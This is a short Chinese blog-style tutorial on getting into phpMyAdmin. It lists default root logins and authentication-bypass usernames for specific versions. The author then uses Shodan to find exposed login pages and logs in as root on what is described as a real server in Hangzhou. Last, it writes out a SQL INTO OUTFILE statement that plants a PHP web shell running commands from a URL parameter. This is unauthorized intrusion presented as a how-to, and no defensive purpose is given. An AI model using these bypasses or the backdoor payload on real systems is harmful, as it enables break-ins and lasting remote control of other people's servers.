- 默認 phpMyAdmin:用戶名 root 密碼 root 或空登陸。
- 版本 2.11.3~2.11.4:用戶名
'localhost'@'@"
登陸,無需密碼。
- 版本 2.11.9.2:用戶名
root
登陸,無需密碼。
經(jīng)測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。
下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin

先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內(nèi)的(浙江省·杭州市)。

地址已手動打碼。

登陸成功(root 權限)。

接下來你可以寫一個 outfile 到對方主機的網(wǎng)絡目錄下。俗稱 “留后門”。
SELECT "?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"
點擊運行,不出意外便在對方主機留下了一個名為 runme.php
的后門文件。
總結
以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對腳本之家的支持。如果你想了解更多相關內(nèi)容請查看下面相關鏈接
您可能感興趣的文章:- PHP中的變量覆蓋漏洞深入解析
- PHP網(wǎng)站常見安全漏洞,及相應防范措施總結
- phpcmsv9.0任意文件上傳漏洞解析
- PHP5.0 TIDY_PARSE_FILE緩沖區(qū)溢出漏洞的解決方案
- 由php中字符offset特征造成的繞過漏洞詳解
- PHP-CGI遠程代碼執(zhí)行漏洞分析與防范
- 你不知道的文件上傳漏洞php代碼分析
- PHP序列化/對象注入漏洞分析
- PHP常見漏洞攻擊分析
- PHP編程中的常見漏洞和代碼實例
- 詳解各種PHP函數(shù)漏洞